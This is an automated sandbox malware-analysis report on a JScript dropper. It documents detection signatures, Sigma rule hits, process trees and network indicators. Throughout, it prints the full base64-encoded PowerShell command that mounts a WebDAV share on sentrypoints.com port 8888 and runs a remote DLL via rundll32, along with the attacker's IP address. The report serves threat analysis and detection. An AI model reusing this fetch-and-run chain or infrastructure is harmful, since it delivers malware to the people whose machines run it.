Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1997614539972622565.js

Overview

General Information

Sample name:1997614539972622565.js
Analysis ID:1543762
MD5:1d5eeb78265b9887d284bf08d25c3368
SHA1:f0203afcf43febcb307812d19c6a010ad194a26d
SHA256:96f7a1602553aaa0f38091bee8055114416a460c7ada60e856ca0882bbbd4127
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Encrypted powershell cmdline option found
JavaScript source code contains functionality to generate code involving a shell, file or stream
Opens network shares
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 7340 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7556 cmdline: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 7592 cmdline: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry, CommandLine: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry, ProcessId: 7592, ProcessName: rundll32.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", ProcessId: 7340, ProcessName: wscript.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 94.159.113.48, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 7556, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7340, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 7392, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", ProcessId: 7340, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, CommandLine|base64offset|contains: Ijw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7340, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, ProcessId: 7392, ProcessName: powershell.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, ProcessId: 7556, ProcessName: net.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7392, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\, ProcessId: 7556, ProcessName: net.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Software Vulnerabilities

barindex
Source: 1997614539972622565.jsArgument value : ['"WScript.Shell"', '"powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAA']Go to definition
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\rundll32.exe

Networking

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 94.159.113.48:8888
Source: Joe Sandbox ViewIP Address: 94.159.113.48 94.159.113.48
Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: sentrypoints.com
Source: powershell.exe, 00000001.00000002.1722539951.0000019860A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: powershell.exe, 00000001.00000002.1721469464.0000019848B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: net.exe, 00000003.00000003.1718704357.00000222C681C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000003.1718812871.00000222C67FE000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1719127387.00000222C67FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sentrypoints.com:8888/
Source: net.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sentrypoints.com:8888/pL
Source: net.exe, 00000003.00000002.1719075045.00000222C67C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sentrypoints.com:8888/paceUl
Source: powershell.exe, 00000001.00000002.1721469464.0000019848A9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.1721469464.0000019848AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
Source: 1997614539972622565.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal84.troj.spyw.expl.evad.winJS@8/3@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teaw0blp.05e.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1997614539972622565.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,Entry
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADIAOQAyADUAMgAyADQANwAzADMAMAAxADIANwAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\229252247330127.dll,EntryJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\net.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 1997614539972622565.jsStatic file information: File size 1424760 > 1048576

Data Obfuscation

barindex
